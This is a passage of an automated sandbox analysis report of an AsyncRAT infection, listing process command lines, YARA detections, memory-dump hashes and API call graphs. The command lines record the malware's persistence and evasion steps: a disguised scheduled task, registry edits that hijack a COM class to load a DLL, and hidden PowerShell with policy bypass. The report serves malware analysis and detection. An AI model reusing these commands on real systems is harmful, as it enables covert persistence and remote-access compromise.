                          Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
                          Imagebase:0x7ff7d52a0000
                          File size:235'008 bytes
                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:10:39:31
                          Start date:12/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
                          Imagebase:0x7ff6c7de0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
                          Imagebase:0x7ff7cb970000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
                          Imagebase:0x7ff71bca0000
                          File size:77'312 bytes
                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:10
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
                          Imagebase:0x7ff71bca0000
                          File size:77'312 bytes
                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:11
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
                          Imagebase:0x7ff7cb970000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:10:39:33
                          Start date:12/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:10:39:38
                          Start date:12/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
                          Imagebase:0xfc0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.3429100433.0000000005B28000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:high
                          Has exited:false

                          Target ID:15
                          Start time:10:41:01
                          Start date:12/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
                          Imagebase:0x7ff6c7de0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
                          Imagebase:0x7ff7cb970000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
                          Imagebase:0x7ff71bca0000
                          File size:77'312 bytes
                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
                          Imagebase:0x7ff71bca0000
                          File size:77'312 bytes
                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
                          Imagebase:0x7ff7cb970000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:21
                          Start time:10:41:04
                          Start date:12/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:22
                          Start time:10:41:08
                          Start date:12/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
                          Imagebase:0x7a0000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.3400803278.0000000005286000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000016.00000002.3400152760.0000000005190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Has exited:true

                          Reset < >
                            Memory Dump Source
                            • Source File: 00000002.00000002.2380946016.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8f575bf5bd98f7485a23b861539900851a63125babce9d2dc4f532de741304e1
                            • Instruction ID: 644f181b52115a5c00ce4fbffde4971b6531e58952a9a96f046b942b7566e10f
                            • Opcode Fuzzy Hash: 8f575bf5bd98f7485a23b861539900851a63125babce9d2dc4f532de741304e1
                            • Instruction Fuzzy Hash: 68820131D0DA8A8FE796EB2888556747BE1EF56340F1804BEC14EC71D3EE28AC46CB55
                            Memory Dump Source
                            • Source File: 00000002.00000002.2380946016.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 840683746526cbcbf5ef04142c88068f337f6e3056919c6583ca2bcd7989363a
                            • Instruction ID: 5e8428b70ce9d2323a66045afd894a7081b5430d1ab545a0b8f42e0cc6aa5a3d
                            • Opcode Fuzzy Hash: 840683746526cbcbf5ef04142c88068f337f6e3056919c6583ca2bcd7989363a
                            • Instruction Fuzzy Hash: 5DD1D53190E7C64FE3569B7858152B47FE1EF562A0F0901FBC14ACB1D3DA28A846CB96
                            Memory Dump Source
                            • Source File: 00000002.00000002.2380946016.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c8a0d264ad25f67682a19c9eda93fb614e41ba775c8a2cdc7bd8a78a0d746b95
                            • Instruction ID: fe7e4309899e0868f9d083da2965c70af3d08ca8f6847b031cb2cb431c81fb28
                            • Opcode Fuzzy Hash: c8a0d264ad25f67682a19c9eda93fb614e41ba775c8a2cdc7bd8a78a0d746b95
                            • Instruction Fuzzy Hash: C451A422D0E7C64FD3539B7858691A4BFE1AF57260B0D01FBC189CB4E3EA1D584AC716
                            Memory Dump Source
                            • Source File: 00000002.00000002.2380946016.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 537f83cd71a601a7695e1896a0a48fef0132026c294d81740337a9f61b3806d2
                            • Instruction ID: 55a2e9822241a46e43608fab853e87ff9f184302d9cfe7193f209f3416cc8aec
                            • Opcode Fuzzy Hash: 537f83cd71a601a7695e1896a0a48fef0132026c294d81740337a9f61b3806d2
                            • Instruction Fuzzy Hash: 5A512731E0EA874FF369AB6C18551B4BAD0FF452A0F1805BAC55EC71C3DE29BC058B99
                            Memory Dump Source
                            • Source File: 00000002.00000002.2376880012.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848dc0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d4e321ef34c5dd0e5be9bb0fcb0b30dbb3d9fad0733610c408bd475f1cbaac1
                            • Instruction ID: 383ae3f1425cdf0b97807817b786d111b61f1b5658d95b7c5f45da6940434a0e
                            • Opcode Fuzzy Hash: 6d4e321ef34c5dd0e5be9bb0fcb0b30dbb3d9fad0733610c408bd475f1cbaac1
                            • Instruction Fuzzy Hash: A4314E31A199598FDF98EF58C456EAD77E1FF68380F50416AE009D3286CF24EC81CB81
                            Memory Dump Source
                            • Source File: 00000002.00000002.2380946016.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 044ac9ca553501c7705ef97f7cfd9a28fc47634a58fcb985768d4b0026a63ccc
                            • Instruction ID: 5d338c90266fc2a51ba08cb7ef6d2fe974df914b6e84003adf668229d5dfe013
                            • Opcode Fuzzy Hash: 044ac9ca553501c7705ef97f7cfd9a28fc47634a58fcb985768d4b0026a63ccc
                            • Instruction Fuzzy Hash: F9216D32E0DBC64FE3A6FB7864981647FE0EF82220B4901FBC559CB1E3DA185C468B01
                            Memory Dump Source
                            • Source File: 00000002.00000002.2376880012.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848dc0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d0562dd0b29a169169f02496da85fc4c2f4ea8ef2f197f3d6e0b938cf706da3
                            • Instruction ID: 029ed78714ce6b9f00a121effbe2462847a76842961101ff46aa2e2a85d8f982
                            • Opcode Fuzzy Hash: 8d0562dd0b29a169169f02496da85fc4c2f4ea8ef2f197f3d6e0b938cf706da3
                            • Instruction Fuzzy Hash: 7C01447111CB0C4FD744EF0CE451AB9B7E0FB95364F10056DE58AC3655D726E881CB45
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2376880012.00007FF848DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848dc0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                            • API String ID: 0-1364355708
                            • Opcode ID: 4c5f37001b0c08834a0c8c3c1f1f0da0e35fbf30c5e4c50dd291ddb491047912
                            • Instruction ID: 6701b403a43af237d8773950e6a5d39f3cb35401b4989314b7a281e8ea8eca59
                            • Opcode Fuzzy Hash: 4c5f37001b0c08834a0c8c3c1f1f0da0e35fbf30c5e4c50dd291ddb491047912
                            • Instruction Fuzzy Hash: 55F1E631D0DA898FEB45EB18C894AE9BBF1FF55390F1801BAD049C7192DB34AC46C785

                            Execution Graph

                            Execution Coverage:9.8%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:14
                            Total number of Limit Nodes:2
                            execution_graph 14012 59d5cd8 14013 59d5d1c SetWindowsHookExW 14012->14013 14015 59d5d62 14013->14015 14016 59dadd8 DuplicateHandle 14017 59dae6e 14016->14017 14018 59dab90 14019 59dabd6 GetCurrentProcess 14018->14019 14021 59dac28 GetCurrentThread 14019->14021 14022 59dac21 14019->14022 14023 59dac65 GetCurrentProcess 14021->14023 14024 59dac5e 14021->14024 14022->14021 14027 59dac9b 14023->14027 14024->14023 14025 59dacc3 GetCurrentThreadId 14026 59dacf4 14025->14026 14027->14025

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 527 59dab8b-59dac1f GetCurrentProcess 532 59dac28-59dac5c GetCurrentThread 527->532 533 59dac21-59dac27 527->533 534 59dac5e-59dac64 532->534 535 59dac65-59dac99 GetCurrentProcess 532->535 533->532 534->535 537 59dac9b-59daca1 535->537 538 59daca2-59dacba 535->538 537->538 549 59dacbd call 59dadd0 538->549 550 59dacbd call 59dad60 538->550 541 59dacc3-59dacf2 GetCurrentThreadId 542 59dacfb-59dad5d 541->542 543 59dacf4-59dacfa 541->543 543->542 549->541 550->541
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 059DAC0E
                            • GetCurrentThread.KERNEL32 ref: 059DAC4B
                            • GetCurrentProcess.KERNEL32 ref: 059DAC88
                            • GetCurrentThreadId.KERNEL32 ref: 059DACE1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: 99301eaa33fc2be57171713224ff545b4286301893d573ab357696de0ea0d352
                            • Instruction ID: 2ee5aec4d1f1b51868dc336e832369a091fe815732c926474f5c665c2b364450
                            • Opcode Fuzzy Hash: 99301eaa33fc2be57171713224ff545b4286301893d573ab357696de0ea0d352
                            • Instruction Fuzzy Hash: 365164B09003498FDB14DFAAD549BAEBBF5EF48314F24C419E009A7260CB789885CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 551 59dab90-59dac1f GetCurrentProcess 555 59dac28-59dac5c GetCurrentThread 551->555 556 59dac21-59dac27 551->556 557 59dac5e-59dac64 555->557 558 59dac65-59dac99 GetCurrentProcess 555->558 556->555 557->558 560 59dac9b-59daca1 558->560 561 59daca2-59dacba 558->561 560->561 572 59dacbd call 59dadd0 561->572 573 59dacbd call 59dad60 561->573 564 59dacc3-59dacf2 GetCurrentThreadId 565 59dacfb-59dad5d 564->565 566 59dacf4-59dacfa 564->566 566->565 572->564 573->564
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 059DAC0E
                            • GetCurrentThread.KERNEL32 ref: 059DAC4B
                            • GetCurrentProcess.KERNEL32 ref: 059DAC88
                            • GetCurrentThreadId.KERNEL32 ref: 059DACE1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: 3a05398e043d95980c6b76909a5e33bb686341fa770ff44e36b9520da5372e74
                            • Instruction ID: 750bfcc8129c0876d2395c22b803179fb233916ef3f277acf3096642d42a935c
                            • Opcode Fuzzy Hash: 3a05398e043d95980c6b76909a5e33bb686341fa770ff44e36b9520da5372e74
                            • Instruction Fuzzy Hash: 0C5164B09003498FDB14DFAAD548BAEBFF5FF48314F24C419E009A7260CB789885CB61

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2133 59d5cd0-59d5cd1 2134 59d5cb5-59d5cb7 2133->2134 2135 59d5cd3-59d5d22 2133->2135 2138 59d5d2e-59d5d60 SetWindowsHookExW 2135->2138 2139 59d5d24 2135->2139 2140 59d5d69-59d5d8e 2138->2140 2141 59d5d62-59d5d68 2138->2141 2142 59d5d2c 2139->2142 2141->2140 2142->2138
                            APIs
                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 059D5D53
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: HookWindows
                            • String ID:
                            • API String ID: 2559412058-0
                            • Opcode ID: bd1ed2b378fd7b56014ed52d34a40396bb81bc57f1ff6f6644dda9ba4f425cb5
                            • Instruction ID: af6760b40b2efd74c934094ebe78c60670a92e3ef003bf84841e17ddf69ddad0
                            • Opcode Fuzzy Hash: bd1ed2b378fd7b56014ed52d34a40396bb81bc57f1ff6f6644dda9ba4f425cb5
                            • Instruction Fuzzy Hash: 3C2107B59042099FCB14DFA9C844BEEFBF5FF98310F14842AE459A7250C774A945CFA1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2146 59dadd8-59dae6c DuplicateHandle 2147 59dae6e-59dae74 2146->2147 2148 59dae75-59dae92 2146->2148 2147->2148
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 059DAE5F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 3583d117b87f21da3de07e81a69c36d7b12798afa322221d398deba9fd4f0374
                            • Instruction ID: 0c3b91ae371e515acc676dcc3f66049ff6d0e5918a9d750df55851614356247c
                            • Opcode Fuzzy Hash: 3583d117b87f21da3de07e81a69c36d7b12798afa322221d398deba9fd4f0374
                            • Instruction Fuzzy Hash: 8821D5B59002489FDB10CFAAD584ADEFFF8FB48310F14841AE918A3350D378A954CFA5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2151 59dadd7-59dae6c DuplicateHandle 2152 59dae6e-59dae74 2151->2152 2153 59dae75-59dae92 2151->2153 2152->2153
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 059DAE5F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 5ec61063524e52dbf6c42ee24bbb141b4e5d50cc6389190dc6189cdec3d0984c
                            • Instruction ID: 3372e070e6e932c67ea2283ce81c79ed869338a8a1b1a94604cdc0d62a1332ba
                            • Opcode Fuzzy Hash: 5ec61063524e52dbf6c42ee24bbb141b4e5d50cc6389190dc6189cdec3d0984c
                            • Instruction Fuzzy Hash: 7721C2B59002489FDB10CFA9D584AEEFBF4FB48310F14841AE918A3350D378A954CFA1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2156 59d5cd8-59d5d22 2158 59d5d2e-59d5d60 SetWindowsHookExW 2156->2158 2159 59d5d24 2156->2159 2160 59d5d69-59d5d8e 2158->2160 2161 59d5d62-59d5d68 2158->2161 2162 59d5d2c 2159->2162 2161->2160 2162->2158
                            APIs
                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 059D5D53
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3428481467.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_59d0000_RegSvcs.jbxd
                            Similarity
                            • API ID: HookWindows
                            • String ID:
                            • API String ID: 2559412058-0
                            • Opcode ID: fafd4d03d4ce78f82d20f7c432bae17e18960e7dddeea9e79d8cbdec43b53eba
                            • Instruction ID: 17e009e802a556aeceeedb4f7fd719326b149d267abdd29722e10a075299ac76
                            • Opcode Fuzzy Hash: fafd4d03d4ce78f82d20f7c432bae17e18960e7dddeea9e79d8cbdec43b53eba
                            • Instruction Fuzzy Hash: 1B21E5B59002099FDB14DF9AD844BEEFBF5FF88310F14841AD459A7250CB74A945CFA1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3417271987.00000000031CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031CD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_31cd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e55fa8372b70cf097e6183be47ae96510ec41fae534cd6a7db4b1436e9174d9d
                            • Instruction ID: 8401d2f6f51ca721a625350ec011f7a38aedf660a1b9a4cf8bc3f0acce93ebb9
                            • Opcode Fuzzy Hash: e55fa8372b70cf097e6183be47ae96510ec41fae534cd6a7db4b1436e9174d9d
                            • Instruction Fuzzy Hash: 6D21FFB1514280DFCB05EF14E9C0F26BF69EBAC314F2485BDE9090B216C33AD456CBA2
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3418043437.000000000331D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0331D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_331d000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 514f0356553f2f5cca67b5d46d4905dab328694064d65a7254f666ef5112d2de
                            • Instruction ID: 106d260630bd4b83d433c0765bc752cc652f560ea850b5b67b1e20cb834fd2aa
                            • Opcode Fuzzy Hash: 514f0356553f2f5cca67b5d46d4905dab328694064d65a7254f666ef5112d2de
                            • Instruction Fuzzy Hash: E921F275604204DFCB89CF14D9C0B26BB69EB85314F24C5B9D80A4B256C37AD466CA61
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3417271987.00000000031CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031CD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_31cd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14534b79b66c896ac0d5baafb59a6ce94307be6875aeb631b8849d0664d6cd6d
                            • Instruction ID: 8214ca65e386cf8f4921b574b546d312e6938f6851c9890e73e0af51803fc70a
                            • Opcode Fuzzy Hash: 14534b79b66c896ac0d5baafb59a6ce94307be6875aeb631b8849d0664d6cd6d
                            • Instruction Fuzzy Hash: 7911B176504280CFCB16DF10D9C4B16BF61FB98314F28C5ADD9094B216C336D45ACBA2
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3418043437.000000000331D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0331D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_331d000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d44c5366a0abbdbb00377e6941c51855cc00221bb5ed19b58b533c51b74a4a6c
                            • Instruction ID: 528b0cc815a4ba002e2bb52255cfc698fb498a3a73820b9578af64b29dbe3ad3
                            • Opcode Fuzzy Hash: d44c5366a0abbdbb00377e6941c51855cc00221bb5ed19b58b533c51b74a4a6c
                            • Instruction Fuzzy Hash: FE11BB75504280CFCB4ACF14D9C4B25BBB2FB85314F28C6AAD8494B256C33AD45ACB62
                            Memory Dump Source
                            • Source File: 0000000D.00000002.3417271987.00000000031CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031CD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_31cd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0fa52f01fccc9de08f7ba388636744ed78c6cc44693968cdb3acd6e17ca78f27
                            • Instruction ID: 48b93f5efff871cfe2aa2b932b682fe0ab25f8c89f0e66313023f79b69374a4e
                            • Opcode Fuzzy Hash: 0fa52f01fccc9de08f7ba388636744ed78c6cc44693968cdb3acd6e17ca78f27
                            • Instruction Fuzzy Hash: 81015E7140D3C09FD7128B299C94762BFA8EF57224F1D84DBE9888F2A7C2695C45CB72
